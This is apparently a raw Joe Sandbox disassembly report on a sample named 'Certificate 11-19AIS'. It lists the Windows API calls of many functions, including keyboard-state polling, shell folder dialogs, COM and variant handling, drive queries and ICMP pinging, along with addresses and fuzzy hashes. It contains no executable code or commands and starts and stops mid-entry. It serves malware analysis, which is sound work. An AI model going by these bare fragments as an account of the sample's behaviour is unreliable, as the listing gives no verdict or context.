                                                                              • CoInitialize.OLE32(00000000), ref: 0080034B
                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008003DE
                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 008003F2
                                                                              • CoCreateInstance.OLE32(0083DA8C,00000000,00000001,00863CF8,?), ref: 0080043E
                                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008004AD
                                                                              • CoTaskMemFree.OLE32(?,?), ref: 00800505
                                                                              • _memset.LIBCMT ref: 00800542
                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0080057E
                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008005A1
                                                                              • CoTaskMemFree.OLE32(00000000), ref: 008005A8
                                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 008005DF
                                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 008005E1
                                                                              Similarity
                                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                              • String ID:
                                                                              • API String ID: 1246142700-0
                                                                              • Opcode ID: 8602c8523116059c7341d24087d55efc72e5d21d1041e82f661a00a6bbd46f29
                                                                              • Instruction ID: 309de8b841d9536582293f5bb6cd5baf134adacb548acd6daa6a8b97114651df
                                                                              • Opcode Fuzzy Hash: 8602c8523116059c7341d24087d55efc72e5d21d1041e82f661a00a6bbd46f29
                                                                              • Instruction Fuzzy Hash: 2CB1C575A00209AFDB14DFA4C889EAEBBB9FF88304F148469E905EB251DB34ED41CF50
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?), ref: 007F2ED6
                                                                              • SetKeyboardState.USER32(?), ref: 007F2F41
                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 007F2F61
                                                                              • GetKeyState.USER32(000000A0), ref: 007F2F78
                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 007F2FA7
                                                                              • GetKeyState.USER32(000000A1), ref: 007F2FB8
                                                                              • GetAsyncKeyState.USER32(00000011), ref: 007F2FE4
                                                                              • GetKeyState.USER32(00000011), ref: 007F2FF2
                                                                              • GetAsyncKeyState.USER32(00000012), ref: 007F301B
                                                                              • GetKeyState.USER32(00000012), ref: 007F3029
                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 007F3052
                                                                              • GetKeyState.USER32(0000005B), ref: 007F3060
                                                                              Similarity
                                                                              • API ID: State$Async$Keyboard
                                                                              • String ID:
                                                                              • API String ID: 541375521-0
                                                                              • Opcode ID: 9177e78f32b2e7b0bd4f298c2d32cc1d8154fcecdb627f1d24fefbb1ad1363fe
                                                                              • Instruction ID: d7f5bee0798d750dac957685b6908e1a5205e55c22740176661622269fb4db9a
                                                                              • Opcode Fuzzy Hash: 9177e78f32b2e7b0bd4f298c2d32cc1d8154fcecdb627f1d24fefbb1ad1363fe
                                                                              • Instruction Fuzzy Hash: 2851C620A0478C69FB35EBA488157FABBF59F11340F08859AD7C2563C3DA5C9B8DC762
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000001), ref: 007EED1E
                                                                              • GetWindowRect.USER32(00000000,?), ref: 007EED30
                                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 007EED8E
                                                                              • GetDlgItem.USER32(?,00000002), ref: 007EED99
                                                                              • GetWindowRect.USER32(00000000,?), ref: 007EEDAB
                                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 007EEE01
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 007EEE0F
                                                                              • GetWindowRect.USER32(00000000,?), ref: 007EEE20
                                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 007EEE63
                                                                              • GetDlgItem.USER32(?,000003EA), ref: 007EEE71
                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007EEE8E
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 007EEE9B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                              • String ID:
                                                                              • API String ID: 3096461208-0
                                                                              • Opcode ID: 1357fb42c355c89b468a164d4eeb5dc70621fb7aa29c3d44b976f33a6b925427
                                                                              • Instruction ID: f8fb68e4f59f12f9588ef37bbf1cd7f799bc5da1ac83eba2ca3c0b32fa204c15
                                                                              • Opcode Fuzzy Hash: 1357fb42c355c89b468a164d4eeb5dc70621fb7aa29c3d44b976f33a6b925427
                                                                              • Instruction Fuzzy Hash: FF513FB1B00705AFDF18CF69DD86AAEBBBAFB98700F148529F519D7290E7749D008B50
                                                                              APIs
                                                                                • Part of subcall function 007CB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007CB759,?,00000000,?,?,?,?,007CB72B,00000000,?), ref: 007CBA58
                                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,007CB72B), ref: 007CB7F6
                                                                              • KillTimer.USER32(00000000,?,00000000,?,?,?,?,007CB72B,00000000,?,?,007CB2EF,?,?), ref: 007CB88D
                                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0082D8A6
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007CB72B,00000000,?,?,007CB2EF,?,?), ref: 0082D8D7
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007CB72B,00000000,?,?,007CB2EF,?,?), ref: 0082D8EE
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007CB72B,00000000,?,?,007CB2EF,?,?), ref: 0082D90A
                                                                              • DeleteObject.GDI32(00000000), ref: 0082D91C
                                                                              Similarity
                                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                              • String ID:
                                                                              • API String ID: 641708696-0
                                                                              • Opcode ID: f7742ddbc3234abb8f037440382df0141f70d6c1d04cbb7382ecb16936b1ea6a
                                                                              • Instruction ID: ff8db49d5563120e4b902197a6e47c72d3da5edaab02b7bfd2af7e6ba7027553
                                                                              • Opcode Fuzzy Hash: f7742ddbc3234abb8f037440382df0141f70d6c1d04cbb7382ecb16936b1ea6a
                                                                              • Instruction Fuzzy Hash: 2A613A31501710DFDB259F28E98EB25BBF5FBA4711F14492EF48A86A64C778A8D0DB80
                                                                              APIs
                                                                                • Part of subcall function 007CB526: GetWindowLongW.USER32(?,000000EB), ref: 007CB537
                                                                              • GetSysColor.USER32(0000000F), ref: 007CB438
                                                                              Similarity
                                                                              • API ID: ColorLongWindow
                                                                              • String ID:
                                                                              • API String ID: 259745315-0
                                                                              • Opcode ID: 985dff705f9c8a706cc6df1a9016e14a2f6cccceaf55004441dd9a4a05dae8a5
                                                                              • Instruction ID: 7a01d11086726b578aea6eaa599102533aa6ce2902020a284bb25ab445640be2
                                                                              • Opcode Fuzzy Hash: 985dff705f9c8a706cc6df1a9016e14a2f6cccceaf55004441dd9a4a05dae8a5
                                                                              • Instruction Fuzzy Hash: DE41A030004290ABDF245F28E88AFB93B66FB46731F184669FD65CE1E6D7358D81DB21
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                              • String ID:
                                                                              • API String ID: 136442275-0
                                                                              • Opcode ID: 18d1490c2171cc1113387559fbbd2605aada32356dd6805c5d440b4a0fdf9bf4
                                                                              • Instruction ID: a79bd14ee20e2a028720b82a4e22c815c8ca3f7ca5edfcac67ae8a06a33442e3
                                                                              • Opcode Fuzzy Hash: 18d1490c2171cc1113387559fbbd2605aada32356dd6805c5d440b4a0fdf9bf4
                                                                              • Instruction Fuzzy Hash: 80412E7684511CAECF61DB90CC46DDA73BDEB44300F0041E7F659A2251EB75ABE58FA0
                                                                              APIs
                                                                              • CharLowerBuffW.USER32(0084DC00,0084DC00,0084DC00), ref: 007FD7CE
                                                                              • GetDriveTypeW.KERNEL32(?,00863A70,00000061), ref: 007FD898
                                                                              • _wcscpy.LIBCMT ref: 007FD8C2
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                              • API String ID: 2820617543-1000479233
                                                                              • Opcode ID: 3467ec29c8ff273a3917317d17631e606fbc53c61385916647b6266cef5629fd
                                                                              • Instruction ID: f7daf5ad9a4a3db9f71307e3e83c4ac938a002763432cb5339f56bcec9efaf98
                                                                              • Opcode Fuzzy Hash: 3467ec29c8ff273a3917317d17631e606fbc53c61385916647b6266cef5629fd
                                                                              • Instruction Fuzzy Hash: E2518031104308EFC720EF54D886BAEB7A6FF84354F10892DF69997292DB79ED05CA52
                                                                              APIs
                                                                              • __swprintf.LIBCMT ref: 007B93AB
                                                                              • __itow.LIBCMT ref: 007B93DF
                                                                                • Part of subcall function 007D1557: _xtow@16.LIBCMT ref: 007D1578
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: __itow__swprintf_xtow@16
                                                                              • String ID: %.15g$0x%p$False$True
                                                                              • API String ID: 1502193981-2263619337
                                                                              • Opcode ID: c1383ec0518162710641db04d7a14f740d7bc962cee899d2240ba91afff78180
                                                                              • Instruction ID: ca307e3b014efeb4b41ef3e407ebb1de2dae2941f35b1b07e7d3edd219aba634
                                                                              • Opcode Fuzzy Hash: c1383ec0518162710641db04d7a14f740d7bc962cee899d2240ba91afff78180
                                                                              • Instruction Fuzzy Hash: 0D41D671504214EBDB24DB78E945FAAB3F4FF44300F20446EF65AD7281EA399941CB60
                                                                              APIs
                                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0081A259
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0081A260
                                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0081A273
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0081A27B
                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0081A286
                                                                              • DeleteDC.GDI32(00000000), ref: 0081A28F
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0081A299
                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0081A2AD
                                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0081A2B9
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                              • String ID: static
                                                                              • API String ID: 2559357485-2160076837
                                                                              • Opcode ID: ac9fcdc7955a95d8afc25bc20ea561ee6f3b73c0f9ae7dc8c145856e9dc42ebe
                                                                              • Instruction ID: 356c18133c1c162f0b64dd6ad8ca478d068ee93983c29949d61270b9202da698
                                                                              • Opcode Fuzzy Hash: ac9fcdc7955a95d8afc25bc20ea561ee6f3b73c0f9ae7dc8c145856e9dc42ebe
                                                                              • Instruction Fuzzy Hash: 44318B31101214ABDF259FA4EC49FEA3B6DFF59360F110624FA29E60A0C736D861DBA5
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                              • String ID: 0.0.0.0
                                                                              • API String ID: 2620052-3771769585
                                                                              • Opcode ID: 5b3a546a27cb90caabdeda6bd6b466f6f536eb4abfbd74b8e080a311692a13d3
                                                                              • Instruction ID: 0b6b6fcd349365c3b7f4cc50fafe9d94ceee57474add7b4b5eb9d0687850b60a
                                                                              • Opcode Fuzzy Hash: 5b3a546a27cb90caabdeda6bd6b466f6f536eb4abfbd74b8e080a311692a13d3
                                                                              • Instruction Fuzzy Hash: 5511DA7160421DEBDB24AB74AC4DEEA77BCEF40710F00056AF245D6291EF78DE858790
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 007D5047
                                                                                • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                                              • __gmtime64_s.LIBCMT ref: 007D50E0
                                                                              • __gmtime64_s.LIBCMT ref: 007D5116
                                                                              • __gmtime64_s.LIBCMT ref: 007D5133
                                                                              • __allrem.LIBCMT ref: 007D5189
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007D51A5
                                                                              • __allrem.LIBCMT ref: 007D51BC
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007D51DA
                                                                              • __allrem.LIBCMT ref: 007D51F1
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007D520F
                                                                              • __invoke_watson.LIBCMT ref: 007D5280
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                              • String ID:
                                                                              • API String ID: 384356119-0
                                                                              • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                              • Instruction ID: 41bab9c9ce50feb99ca1fa12f601e57a7e2688661ce7e87743f1fc685d42a563
                                                                              • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                              • Instruction Fuzzy Hash: 0771D5B2A01B16EBE714AE79CC46B6A73B8BF14764F14422BF414D6381E778ED408BD0
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 007F4DF8
                                                                              • GetMenuItemInfoW.USER32(00871708,000000FF,00000000,00000030), ref: 007F4E59
                                                                              • SetMenuItemInfoW.USER32(00871708,00000004,00000000,00000030), ref: 007F4E8F
                                                                              • Sleep.KERNEL32(000001F4), ref: 007F4EA1
                                                                              • GetMenuItemCount.USER32(?), ref: 007F4EE5
                                                                              • GetMenuItemID.USER32(?,00000000), ref: 007F4F01
                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 007F4F2B
                                                                              • GetMenuItemID.USER32(?,?), ref: 007F4F70
                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007F4FB6
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007F4FCA
                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007F4FEB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                              • String ID:
                                                                              • API String ID: 4176008265-0
                                                                              • Opcode ID: 906876ead408647fd3ee83ed5b3365d0e043dd83619d1f5d4c4dcdd95115f6ae
                                                                              • Instruction ID: dd141ea0f2a0ecfc6b34d526ec1e6352f5bf23141f1d6a01d0b3a78d91cdd8e7
                                                                              • Opcode Fuzzy Hash: 906876ead408647fd3ee83ed5b3365d0e043dd83619d1f5d4c4dcdd95115f6ae
                                                                              • Instruction Fuzzy Hash: D9617A7190024DAFDB21CFA8D888ABF7BF8BB41318F180559FA56A7351D738AD45CB20
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00819C98
                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00819C9B
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00819CBF
                                                                              • _memset.LIBCMT ref: 00819CD0
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00819CE2
                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00819D5A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow_memset
                                                                              • String ID:
                                                                              • API String ID: 830647256-0
                                                                              • Opcode ID: f23c12a89ee63ae4ee98f3b9a318d87691962950327ee8af507d6a91f703e3ce
                                                                              • Instruction ID: ebcf2a33c6a66de9c65e50fb9b8393600011f7b32a675d43e0724c1bb013581d
                                                                              • Opcode Fuzzy Hash: f23c12a89ee63ae4ee98f3b9a318d87691962950327ee8af507d6a91f703e3ce
                                                                              • Instruction Fuzzy Hash: 35618B75900208AFDB10DFA8DC85EEE77B8FF09704F14415AFA58E7291D774AA82DB50
                                                                              APIs
                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 007E94FE
                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 007E9549
                                                                              • VariantInit.OLEAUT32(?), ref: 007E955B
                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 007E957B
                                                                              • VariantCopy.OLEAUT32(?,?), ref: 007E95BE
                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 007E95D2
                                                                              • VariantClear.OLEAUT32(?), ref: 007E95E7
                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 007E95F4
                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007E95FD
                                                                              • VariantClear.OLEAUT32(?), ref: 007E960F
                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007E961A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                              • String ID:
                                                                              • API String ID: 2706829360-0
                                                                              • Opcode ID: 0c84396098bfdc6ab754bd6c918a10f43214b4d10a9d279576cbda2d83d86160
                                                                              • Instruction ID: 57c012868ca86783f9e0af7db298d78c1b6af9eabfc3ffc9d7cce0c39e6e82a0
                                                                              • Opcode Fuzzy Hash: 0c84396098bfdc6ab754bd6c918a10f43214b4d10a9d279576cbda2d83d86160
                                                                              • Instruction Fuzzy Hash: F2415E71900219EFCB01EFA5EC489DEBB79FF48354F008469F501A3251DB34EA55CBA5
                                                                              APIs
                                                                                • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                                                • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                                              • CoInitialize.OLE32 ref: 0080ADF6
                                                                              • CoUninitialize.OLE32 ref: 0080AE01
                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,0083D8FC,?), ref: 0080AE61
                                                                              • IIDFromString.OLE32(?,?), ref: 0080AED4
                                                                              • VariantInit.OLEAUT32(?), ref: 0080AF6E
                                                                              • VariantClear.OLEAUT32(?), ref: 0080AFCF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                              • API String ID: 834269672-1287834457
                                                                              • Opcode ID: de5d8e144fc928862ced869a9f70374409c798f5c0003468a9a5d5fc5f3e7ff1
                                                                              • Instruction ID: 104b2ed65bd90340f6d6586e1d271917b8904a563cecd842025d7f960d2b4cbf
                                                                              • Opcode Fuzzy Hash: de5d8e144fc928862ced869a9f70374409c798f5c0003468a9a5d5fc5f3e7ff1
                                                                              • Instruction Fuzzy Hash: 4F615671208312AFC755DF64D889B6ABBE8FF88714F104819FA85DB291CB74ED44CB92
                                                                              APIs
                                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00808168
                                                                              • inet_addr.WSOCK32(?,?,?), ref: 008081AD
                                                                              • gethostbyname.WSOCK32(?), ref: 008081B9
                                                                              • IcmpCreateFile.IPHLPAPI ref: 008081C7
                                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00808237
                                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0080824D
                                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 008082C2
                                                                              • WSACleanup.WSOCK32 ref: 008082C8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                              • String ID: Ping
                                                                              • API String ID: 1028309954-2246546115
                                                                              • Opcode ID: 883df0f7c58f31fb073c3204c2db4a469662873549e9e508c0c858789a5a0de5
                                                                              • Instruction ID: f5c2b9d3f2ee89cc00876776583f7863a3e706b0321de856fe4b25c4d13571c3
                                                                              • Opcode Fuzzy Hash: 883df0f7c58f31fb073c3204c2db4a469662873549e9e508c0c858789a5a0de5
                                                                              • Instruction Fuzzy Hash: A6517A31604704DFD760AB24DC49B6ABBE5FF48310F048829FA95DB2E1DB74E941CB41
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 007FE396
                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007FE40C
                                                                              • GetLastError.KERNEL32 ref: 007FE416
                                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 007FE483
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                              • API String ID: 4194297153-14809454
                                                                              • Opcode ID: 051aa775f3aadaec03d374f2a5f3340d18ea5efa507ca5cbfb4c2b4520b64d01
                                                                              • Instruction ID: 270f41aa8b8737f233142a3c7e8d7041c010772b9919030dcc152160ae0cd68a
                                                                              • Opcode Fuzzy Hash: 051aa775f3aadaec03d374f2a5f3340d18ea5efa507ca5cbfb4c2b4520b64d01
                                                                              • Instruction Fuzzy Hash: C9314035A0024DDBDB01EB68D949BBEB7B4FF44300F148469FA15EB3A1DA789A01CB91
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 007EB98C
                                                                              • GetDlgCtrlID.USER32 ref: 007EB997
                                                                              • GetParent.USER32 ref: 007EB9B3
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 007EB9B6
                                                                              • GetDlgCtrlID.USER32(?), ref: 007EB9BF
                                                                              • GetParent.USER32(?), ref: 007EB9DB
                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 007EB9DE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 1383977212-1403004172
                                                                              • Opcode ID: 496d29dd676cbab2fd5eaa37a0a2378a3cbae63b6519fd5408bab043b24535ee
                                                                              • Instruction ID: 3eced2d592a76bccf60b70d00c4dcc4f7363ad88d580907e80102558a76cff97
                                                                              • Opcode Fuzzy Hash: 496d29dd676cbab2fd5eaa37a0a2378a3cbae63b6519fd5408bab043b24535ee
                                                                              • Instruction Fuzzy Hash: D021C4B4900204EFCB05ABA1DC86EFEBBB4EB99300B104115F661972D2DB7D98159B60
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007EBA73
                                                                              • GetDlgCtrlID.USER32 ref: 007EBA7E
                                                                              • GetParent.USER32 ref: 007EBA9A
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 007EBA9D
                                                                              • GetDlgCtrlID.USER32(?), ref: 007EBAA6
                                                                              • GetParent.USER32(?), ref: 007EBAC2
                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 007EBAC5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
